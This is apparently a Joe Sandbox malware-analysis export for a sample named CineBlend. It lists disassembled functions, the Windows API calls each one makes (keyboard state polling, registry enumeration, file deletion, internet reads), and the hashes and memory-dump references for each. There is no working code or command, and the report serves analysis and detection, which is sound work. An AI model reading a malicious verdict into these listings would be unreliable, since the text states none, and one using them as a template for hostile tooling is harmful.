Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: ce9702be1816438bbb3837a867cf3f8e8769fbb1516e3de7f638146526967ade
Instruction ID: 2ba8165589c07f97c976b1149567d466b0408bf0c192de81babfc5ca4df9a3b9
Opcode Fuzzy Hash: ce9702be1816438bbb3837a867cf3f8e8769fbb1516e3de7f638146526967ade
Instruction Fuzzy Hash: D0E0863560262217D2211725AC18B9AA7A8DF93B12B060156FD80F3254EF60CD0180A9

Function 00B46607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B85657,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B46610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B46622
FreeLibrary.KERNEL32(00000000,?,?,00B85657,?,?,00B462FA,?,00000001,?,?,00000000), ref: 00B46635

Strings

kernel32.dll, xrefs: 00B46609
Wow64RevertWow64FsRedirection, xrefs: 00B4661C

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 520b10bfd7e2955a9217924aaa5457112ca7985049abadd7c477d9eb92a20763
Instruction ID: fdb76f5b54244816b52c226568bb71eea7060b62841b8d564bc931b2f8b4633c
Opcode Fuzzy Hash: 520b10bfd7e2955a9217924aaa5457112ca7985049abadd7c477d9eb92a20763
Instruction Fuzzy Hash: DFD0123561353257823227256C28BCFAB58DE92B113060066B940B3154EF70CE41D599

Function 00BB3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB35C4
DeleteFileW.KERNEL32(?), ref: 00BB3646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00BB365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00BB367F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: e2e6ddf25c7dfe70fde9ec652467c17a6e92369587037013896b672477d4ff24
Instruction ID: 258739feda5b1b0841e049f9745b29b0671e936f4a21244cbf8ecb31c9367e7e
Opcode Fuzzy Hash: e2e6ddf25c7dfe70fde9ec652467c17a6e92369587037013896b672477d4ff24
Instruction Fuzzy Hash: 49B14C72E00129ABDF15DBA4CC85EEEBBFDEF49710F0040E6F50AA7151EA749B448B61

Function 00BCADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00BCAE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BCAE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BCAEC8
CloseHandle.KERNEL32(?), ref: 00BCB09D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 6a4c3d6923506b137e84a70718c0207b5acebb6ad68608f0ca4af58607a31fd5
Instruction ID: 134e101fe4c5d3ce7697d56b97b3f6926705d6ab10c636f76c086764d29e3725
Opcode Fuzzy Hash: 6a4c3d6923506b137e84a70718c0207b5acebb6ad68608f0ca4af58607a31fd5
Instruction Fuzzy Hash: 15A1A271A04301AFE720DF28C886F2AB7E5EF44714F14889DF5A99B292DB71ED41CB91

Function 00B7BEA7 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00BE46D0), ref: 00B7BF11
WideCharToMultiByte.KERNEL32(00000000,00000000,00C1221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00B7BF89
WideCharToMultiByte.KERNEL32(00000000,00000000,00C12270,000000FF,?,0000003F,00000000,?), ref: 00B7BFB6
_free.LIBCMT ref: 00B7BEFF

Part of subcall function 00B72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?), ref: 00B72D4E
Part of subcall function 00B72D38: GetLastError.KERNEL32(?,?,00B7DB51,?,00000000,?,00000000,?,00B7DB78,?,00000007,?,?,00B7DF75,?,?), ref: 00B72D60

_free.LIBCMT ref: 00B7C0CB

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 8bb9dfee88d04dac8662cdc177e239c837ccb2e69f13780d745caac4acb0ab09
Instruction ID: af0d8bb7ee41b8df9ac8f06b9150ef741042d886769ff4879c021f2d6ec18160
Opcode Fuzzy Hash: 8bb9dfee88d04dac8662cdc177e239c837ccb2e69f13780d745caac4acb0ab09
Instruction Fuzzy Hash: D451E871900205AFCB10EF65DC81FAEB7F8EF41720B1082EAE5789B191EB709D519F50

Function 00BCC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Part of subcall function 00BCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCC10E,?,?), ref: 00BCD415
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD451
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4C8
Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BCC505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BCC560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BCC5C3
RegCloseKey.ADVAPI32(?,?), ref: 00BCC606
RegCloseKey.ADVAPI32(00000000), ref: 00BCC613

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 8b3181dd3404ff4bc54a93bd08946210c327ef09aeb32cd0189a31a05a0d58b1
Instruction ID: 76bcf0e28f336847203707b9b644c07eae0f43019532af8007d5083b1bb6b97c
Opcode Fuzzy Hash: 8b3181dd3404ff4bc54a93bd08946210c327ef09aeb32cd0189a31a05a0d58b1
Instruction Fuzzy Hash: B2617F71208241AFD714DF14C891F2ABBE5FF94308F5485ADF4998B2A2DB31ED46CB92

Function 00BAED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BAE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BAD7CD,?), ref: 00BAE714

Part of subcall function 00BAE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BAD7CD,?), ref: 00BAE72D

Part of subcall function 00BAEAB0: GetFileAttributesW.KERNEL32(?,00BAD840), ref: 00BAEAB1

lstrcmpiW.KERNEL32(?,?), ref: 00BAED8A
MoveFileW.KERNEL32(?,?), ref: 00BAEDC3
_wcslen.LIBCMT ref: 00BAEF02
_wcslen.LIBCMT ref: 00BAEF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00BAEF67

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: ba4bf772319ef991d1d70903e6c3838cf4ab23f1c5b91cfd09a28ac89539d6d6
Instruction ID: 325affc68150169e23444b69dbc06d47740ff2597e78d5ade77a1f224b6588bd
Opcode Fuzzy Hash: ba4bf772319ef991d1d70903e6c3838cf4ab23f1c5b91cfd09a28ac89539d6d6
Instruction Fuzzy Hash: FC515DB250C3859BC724EB94D8919DBB3ECEF95300F00096EF299D3151EF35E6888B66

Function 00BA9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BA9534
VariantClear.OLEAUT32 ref: 00BA95A5
VariantClear.OLEAUT32 ref: 00BA9604
VariantClear.OLEAUT32(?), ref: 00BA9677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BA96A2

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: c846cf55a1bb235e38c920fa1fcf2a463f4f66bcf1b58cdf1722c3bd5a8fd574
Instruction ID: 3e39d5569cb3fccb008035f792c7c129c6d9e9ee04aed61350aed4013cf2154e
Opcode Fuzzy Hash: c846cf55a1bb235e38c920fa1fcf2a463f4f66bcf1b58cdf1722c3bd5a8fd574
Instruction Fuzzy Hash: 365147B5A04219EFCB14CF68C894EAAB7F8FF89310B158559E909EB314E730E911CF90

Function 00BB9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BB95F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00BB961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BB9677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BB969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BB96A4

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: c380c2bfd18d3c4ddb57ac63472217788d8941e41affb3bed655e5b462c6cbbf
Instruction ID: 7e6665c31a38dd81786c9528d19ef28241098c6b3c0112e187f3c140b425a0b5
Opcode Fuzzy Hash: c380c2bfd18d3c4ddb57ac63472217788d8941e41affb3bed655e5b462c6cbbf
Instruction Fuzzy Hash: C4514E35A002199FCB05DF55C881AAEBBF5FF49314F048098E94AAB362DB75ED41DB90

Function 00BC9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00BC999D
GetProcAddress.KERNEL32(00000000,?), ref: 00BC9A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00BC9A49
GetProcAddress.KERNEL32(00000000,?), ref: 00BC9A8F
FreeLibrary.KERNEL32(00000000), ref: 00BC9AAF

Part of subcall function 00B5F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00BB1A02,?,75B8E610), ref: 00B5F9F1
Part of subcall function 00B5F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00BA0354,00000000,00000000,?,?,00BB1A02,?,75B8E610,?,00BA0354), ref: 00B5FA18

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 723e033a2c82cbe1b54fb0807c33f71c13bf11979c2e484eefbf406dab271961
Instruction ID: 48d16f40ab24106950786f9ee9bf876b9ef6df268c1612302cbdd119392c17eb
Opcode Fuzzy Hash: 723e033a2c82cbe1b54fb0807c33f71c13bf11979c2e484eefbf406dab271961
Instruction Fuzzy Hash: 90513A35601245DFDB01DF68C494EA9BBF0FF09314B1480E9E856AB762DB31ED86CB91

Function 00BD75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00BD766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00BD7682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00BD76AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00BBB5BE,00000000,00000000), ref: 00BD76D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00BD76FF

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 8dfc2002b300939ff28154d08319cb9b1aa7774379034a3cab7d711c97e3e53e
Instruction ID: 36c87595d8abc85e2085761338b5ae1a396ad360753b7992ea50aceb0f06ee49
Opcode Fuzzy Hash: 8dfc2002b300939ff28154d08319cb9b1aa7774379034a3cab7d711c97e3e53e
Instruction Fuzzy Hash: 9C41B135A88504AFD725CF6CCC98FE9FBE5EB06350F1502A6E859A73A0FA70ED10D650

Function 00B723C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B72433
_free.LIBCMT ref: 00B72453

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 97b6e949a07192011c9d20f735668f27b55b334f8bcba0b4f12f6f72c4bb4460
Instruction ID: 5b7d76da86c8fabce6b84c2e34b98d9a9bc3e23bff13026cb1f6df4b7fd2979c
Opcode Fuzzy Hash: 97b6e949a07192011c9d20f735668f27b55b334f8bcba0b4f12f6f72c4bb4460
Instruction Fuzzy Hash: 8741B236A002009FDB24DF78C881A5EB7F5EF89714F1585E9E62AEB351D731AD01CB80

Function 00B419CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B419E1
ScreenToClient.USER32(00000000,?), ref: 00B419FE
GetAsyncKeyState.USER32(00000001), ref: 00B41A23
GetAsyncKeyState.USER32(00000002), ref: 00B41A3D

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 149706d21831ac67b61a559d288011a5ef0830894be0054ddf85de34f3e6f0d1
Instruction ID: 29729e5edadff1b504dc6b0360a8575a9a1535328324057ceef5668af73b07cc
Opcode Fuzzy Hash: 149706d21831ac67b61a559d288011a5ef0830894be0054ddf85de34f3e6f0d1
Instruction Fuzzy Hash: A2417175A0410AFFDF05AF68C888AEDF7F4FF05B24F208656E469A22A0D7345E90DB51

Function 00BB42B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00BB4310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00BB4367
TranslateMessage.USER32(?), ref: 00BB4390
DispatchMessageW.USER32(?), ref: 00BB439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB43AB

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 4c46288902816898d1d5ae3f94594a172ff8ff1d77eaeb17bc3aafb5cdd2d814
Instruction ID: 0962805831a36899ed194f9c2499fce847890c28437dc739c94d272935f92de5
Opcode Fuzzy Hash: 4c46288902816898d1d5ae3f94594a172ff8ff1d77eaeb17bc3aafb5cdd2d814
Instruction Fuzzy Hash: BE318370504346DFEB298B74D849FFA7BE8FB01304F0845B9D4A2C21A2E7E49959CB25

Function 00BA224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00BA2262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00BA230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00BA2316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00BA2327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00BA232F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 935f8610a46fdc4497f602589e06b60e85a69f29e3f988a9f24ecbb419a04871
Instruction ID: c2c09f557277c4ca55a5d6a08dc7dfb4eaf355f81222b876a4954c1e32b60783
Opcode Fuzzy Hash: 935f8610a46fdc4497f602589e06b60e85a69f29e3f988a9f24ecbb419a04871
Instruction Fuzzy Hash: DC31CD71904219EFDB04CFACCD89BDE7BB5EB05315F004269FA21A72D0D770A944CB90

Function 00BBD95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00BBCC63,00000000), ref: 00BBD97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00BBD9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00BBCC63,00000000), ref: 00BBD9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00BBCC63,00000000), ref: 00BBDA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00BBCC63,00000000), ref: 00BBDA37

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: bf2cda6c38896dec6ac54b4c58dde06d568a187c8d1b05173ccd510e1d4a3016
Instruction ID: bca3eba1e179e7eae943b7df4149c6273e2002f5514460492022ddc54898984a
Opcode Fuzzy Hash: bf2cda6c38896dec6ac54b4c58dde06d568a187c8d1b05173ccd510e1d4a3016
Instruction Fuzzy Hash: 13315071504605EFDB24DFA5D894ABBB7F8EB04350B1044AEF586D3150EB78ED40DB60

Function 00BD61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BD61E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00BD623C
_wcslen.LIBCMT ref: 00BD624E
_wcslen.LIBCMT ref: 00BD6259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD62B5

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
